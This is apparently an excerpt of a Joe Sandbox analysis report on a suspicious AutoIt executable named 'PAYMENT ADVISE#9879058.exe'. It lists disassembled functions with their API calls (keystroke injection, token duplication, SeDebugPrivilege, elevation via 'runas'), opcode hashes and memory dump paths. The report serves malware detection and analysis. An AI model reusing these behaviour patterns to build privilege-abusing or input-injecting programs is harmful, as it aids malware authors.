                          • Instruction Fuzzy Hash: 118366F1905B409FC351DFAAF984605BAE1F3AA3157A2857FC5088B731D7B8194A8F4C
                          Function 0047C08E Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 676windowkeyboardCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
                          • DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
                          • GetKeyState.USER32(00000011), ref: 0047C1A4
                          • GetKeyState.USER32(00000009), ref: 0047C1AD
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
                          • GetKeyState.USER32(00000010), ref: 0047C1CA
                          • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
                          • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
                          • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
                          • SendMessageW.USER32 ref: 0047C2FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend$State$LongProcWindow
                          • String ID: @GUI_DRAGID$F
                          • API String ID: 1562745308-4164748364
                          • Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                          • Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
                          • Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                          • Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A
                          Function 004375B0 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 126threadkeyboardwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetForegroundWindow.USER32(00000000,?,?,004448AF,?), ref: 004375B3
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004375D8
                          • IsIconic.USER32(?), ref: 004375E1
                          • ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
                          • SetForegroundWindow.USER32(?), ref: 004375FD
                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
                          • GetCurrentThreadId.KERNEL32 ref: 00437619
                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437638
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 0043763E
                          • SetForegroundWindow.USER32(?), ref: 00437645
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
                          • keybd_event.USER32(00000012,00000000), ref: 0043765D
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
                          • keybd_event.USER32(00000012,00000000), ref: 00437674
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
                          • keybd_event.USER32(00000012,00000000), ref: 0043768B
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
                          • keybd_event.USER32(00000012,00000000), ref: 004376A2
                          • SetForegroundWindow.USER32(?), ref: 004376AD
                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D3
                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                          • String ID: Shell_TrayWnd
                          • API String ID: 3778422247-2988720461
                          • Opcode ID: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                          • Instruction ID: 6108fbe056c1a000d5481f33e03d330ccc862392245923d3170deea12ea07584
                          • Opcode Fuzzy Hash: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                          • Instruction Fuzzy Hash: AC31A4712803157FE6245BA59D0EF7F3F9CEB48B51F10082EFA02EA1D1DAE458009B79
                          Function 004461ED Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 227processCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 0044621B
                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044628A
                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
                          • GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462BD
                          • SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462C8
                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
                          • _wcslen.LIBCMT ref: 0044639E
                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                          • _wcsncpy.LIBCMT ref: 004463C7
                          • LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
                          • CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
                          • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
                          • UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
                          • CloseWindowStation.USER32(00000000,?,?,?,?), ref: 00446497
                          • CloseDesktop.USER32(00000000,?,?,?,?), ref: 0044649E
                          • SetProcessWindowStation.USER32(?,?,?,?,?), ref: 004464A9
                          • CloseHandle.KERNEL32(?,?,?,?,?), ref: 004464B4
                          • DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                          • String ID: $default$winsta0
                          • API String ID: 2173856841-1027155976
                          • Opcode ID: 60466c812311f25fb86c91292e7101a774af41f6c0f7563e11afd4658bd94aff
                          • Instruction ID: eafd5d154f9bcf2590b8f8eb1e0f3d39b01f77f2fd200ee1cb9c7344d9c52646
                          • Opcode Fuzzy Hash: 60466c812311f25fb86c91292e7101a774af41f6c0f7563e11afd4658bd94aff
                          • Instruction Fuzzy Hash: DD819170208341AFE724DF65C848B6FBBE8AF89744F04491DF69097291DBB8D805CB6B
                          Function 0044BD29 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe,?,C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe,004A8E80,C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe,0040F3D2), ref: 0040FFCA
                            • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
                            • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
                            • Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93
                            • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                          • _wcscat.LIBCMT ref: 0044BD96
                          • _wcscat.LIBCMT ref: 0044BDBF
                          • __wsplitpath.LIBCMT ref: 0044BDEC
                          • FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
                          • _wcscpy.LIBCMT ref: 0044BE73
                          • _wcscat.LIBCMT ref: 0044BE85
                          • _wcscat.LIBCMT ref: 0044BE97
                          • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
                          • DeleteFileW.KERNEL32(?), ref: 0044BED5
                          • MoveFileW.KERNEL32(?,?), ref: 0044BEF5
                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0C
                          • DeleteFileW.KERNEL32(?), ref: 0044BF17
                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2E
                          • FindClose.KERNEL32(00000000), ref: 0044BF35
                          • MoveFileW.KERNEL32(?,?), ref: 0044BF51
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
                          • FindClose.KERNEL32(00000000), ref: 0044BF7E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                          • String ID: \*.*
                          • API String ID: 2188072990-1173974218
                          • Opcode ID: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                          • Instruction ID: 14f7055b3521afb04026f42b490306401b0ba37f80ed0ea0ca267746d8cc4687
                          • Opcode Fuzzy Hash: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                          • Instruction Fuzzy Hash: CA5166B2008344AAD720DBA4DC44FDF73E8AB85314F448D1EF68982141EB79D64CCBAA
                          Function 0042039F Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 282timeCOMMON
                          Download Yara Rule
                          APIs
                          • __invoke_watson.LIBCMT ref: 004203A4
                            • Part of subcall function 00417D93: _memset.LIBCMT ref: 00417DBB
                            • Part of subcall function 00417D93: IsDebuggerPresent.KERNEL32(?,?,00000314), ref: 00417E6F
                            • Part of subcall function 00417D93: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000314), ref: 00417E79
                            • Part of subcall function 00417D93: UnhandledExceptionFilter.KERNEL32(?,?,?,00000314), ref: 00417E86
                            • Part of subcall function 00417D93: GetCurrentProcess.KERNEL32(C0000417,?,?,00000314), ref: 00417EA1
                            • Part of subcall function 00417D93: TerminateProcess.KERNEL32(00000000,?,?,00000314), ref: 00417EA8
                          • __get_daylight.LIBCMT ref: 004203B0
                          • __invoke_watson.LIBCMT ref: 004203BF
                          • __get_daylight.LIBCMT ref: 004203CB
                          • __invoke_watson.LIBCMT ref: 004203DA
                          • ____lc_codepage_func.LIBCMT ref: 004203E2
                          • _strlen.LIBCMT ref: 00420442
                          • __malloc_crt.LIBCMT ref: 00420449
                          • _strlen.LIBCMT ref: 0042045F
                          • _strcpy_s.LIBCMT ref: 0042046D
                          • __invoke_watson.LIBCMT ref: 00420482
                          • GetTimeZoneInformation.KERNEL32(00496C28), ref: 004204AA
                          • WideCharToMultiByte.KERNEL32(?,?,00496C2C,?,?,0000003F,?,?), ref: 00420528
                          • WideCharToMultiByte.KERNEL32(?,?,00496C80,000000FF,?,0000003F,?,?,?,00496C2C,?,?,0000003F,?,?), ref: 0042055C
                            • Part of subcall function 00413A88: __lock.LIBCMT ref: 00413AA6
                            • Part of subcall function 00413A88: ___sbh_find_block.LIBCMT ref: 00413AB1
                            • Part of subcall function 00413A88: ___sbh_free_block.LIBCMT ref: 00413AC0
                            • Part of subcall function 00413A88: RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                            • Part of subcall function 00413A88: GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                          • __invoke_watson.LIBCMT ref: 004205CC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: __invoke_watson$ByteCharExceptionFilterMultiProcessUnhandledWide__get_daylight_strlen$CurrentDebuggerErrorFreeHeapInformationLastPresentTerminateTimeZone____lc_codepage_func___sbh_find_block___sbh_free_block__lock__malloc_crt_memset_strcpy_s
                          • String ID: S\
                          • API String ID: 4084823496-393906132
                          • Opcode ID: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                          • Instruction ID: b357f19af7064e56bcdb8625987f67de7edc2332d57e558cb2e7b84f91b73af7
                          • Opcode Fuzzy Hash: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                          • Instruction Fuzzy Hash: 6A91D371E00125AFDB20EF65EC819AE7BE9EF55300B95003BF540A7253DA3C89828F5C
                          Function 00434D50 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 114fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
                          • __swprintf.LIBCMT ref: 00434D91
                          • _wcslen.LIBCMT ref: 00434D9B
                          • _wcslen.LIBCMT ref: 00434DB0
                          • _wcslen.LIBCMT ref: 00434DC5
                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
                          • _memset.LIBCMT ref: 00434E27
                          • _wcslen.LIBCMT ref: 00434E3C
                          • _wcsncpy.LIBCMT ref: 00434E6F
                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
                          • CloseHandle.KERNEL32(00000000), ref: 00434EB4
                          • RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
                          • CloseHandle.KERNEL32(00000000), ref: 00434ECE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                          • String ID: :$\$\??\%s
                          • API String ID: 302090198-3457252023
                          • Opcode ID: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                          • Instruction ID: 730b2dca1b6b09bd6b76555d3316dee95f4818bcffb97f26f8f03165767cfd2f
                          • Opcode Fuzzy Hash: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                          • Instruction Fuzzy Hash: 30416676604340ABE330EB64DC49FEF73E8AFD8714F00891EF649921D1E7B4A645876A
                          Function 00464422 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 193threadCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
                          • GetLastError.KERNEL32 ref: 004644B4
                          • GetCurrentThread.KERNEL32 ref: 004644C8
                          • OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
                          • OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
                          • String ID: SeDebugPrivilege
                          • API String ID: 1312810259-2896544425
                          • Opcode ID: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                          • Instruction ID: c3f5e6af55eb0da9fa74db60d4f5a84adac3a89a74612fbe59a223ef38337450
                          • Opcode Fuzzy Hash: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                          • Instruction Fuzzy Hash: 0E51A171200201AFD710DF65DD85F5BB7A8AB84704F10892EFB44DB2C1D7B8E844CBAA
                          Function 0040D6D0 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 141windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
                            • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
                            • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
                            • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
                            • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
                            • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
                            • Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF
                          • IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
                          • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
                            • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
                          • SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe,00000004), ref: 0040D7D6
                          • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
                          • SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe,00000004), ref: 00431B0E
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe,00000004), ref: 00431B3F
                          • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
                          • ShellExecuteW.SHELL32(00000000), ref: 00431B92
                            • Part of subcall function 004101F0: GetSysColorBrush.USER32(0000000F), ref: 004101F9
                            • Part of subcall function 004101F0: LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                            • Part of subcall function 004101F0: LoadIconW.USER32(?,00000063), ref: 0041021F
                            • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A4), ref: 00410232
                            • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A2), ref: 00410245
                            • Part of subcall function 004101F0: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                            • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
                            • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                            • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                            • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
                            • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
                            • Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
                            • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                          • String ID: @GH$@GH$C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                          • API String ID: 2493088469-3889506939
                          • Opcode ID: 69cfb0be49d24e5250ef6e64c59b5ea2b0a961f7c54b5140d3e7fdea8d41d4c7
                          • Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
                          • Opcode Fuzzy Hash: 69cfb0be49d24e5250ef6e64c59b5ea2b0a961f7c54b5140d3e7fdea8d41d4c7
                          • Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E
                          Function 004037E0 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 359COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
                          • __wsplitpath.LIBCMT ref: 004038B2
                            • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                          • _wcscpy.LIBCMT ref: 004038C7
                          • _wcscat.LIBCMT ref: 004038DC
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                            • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                            • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                            • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                            • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
                            • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
                          • _wcscpy.LIBCMT ref: 004039C2
                          • _wcslen.LIBCMT ref: 00403A53
                          • _wcslen.LIBCMT ref: 00403AAA
                          Strings
                          • Error opening the file, xrefs: 0042B8AC
                          • Unterminated string, xrefs: 0042B9BA
                          • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
                          • _, xrefs: 00403B48
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                          • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                          • API String ID: 4115725249-188983378
                          • Opcode ID: 3d47019ae40ddf295a6fa6cd32c8ae21ab53d4334480ddcc4f0e34d1fe96fec4
                          • Instruction ID: dca64db042171ec5605b2d10b6a92a42a2076cc25022adee7b8115af8a15fc96
                          • Opcode Fuzzy Hash: 3d47019ae40ddf295a6fa6cd32c8ae21ab53d4334480ddcc4f0e34d1fe96fec4
                          • Instruction Fuzzy Hash: 16D1D5B15083019AD710EF65C841AEB77E8AF95308F04492FF5C563292DB78DA49C7AB
                          Function 00434BEE Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 00434C12
                          • GetFileAttributesW.KERNEL32(?), ref: 00434C4F
                          • SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
                          • FindClose.KERNEL32(00000000), ref: 00434C88
                          • FindClose.KERNEL32(00000000), ref: 00434C9C
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
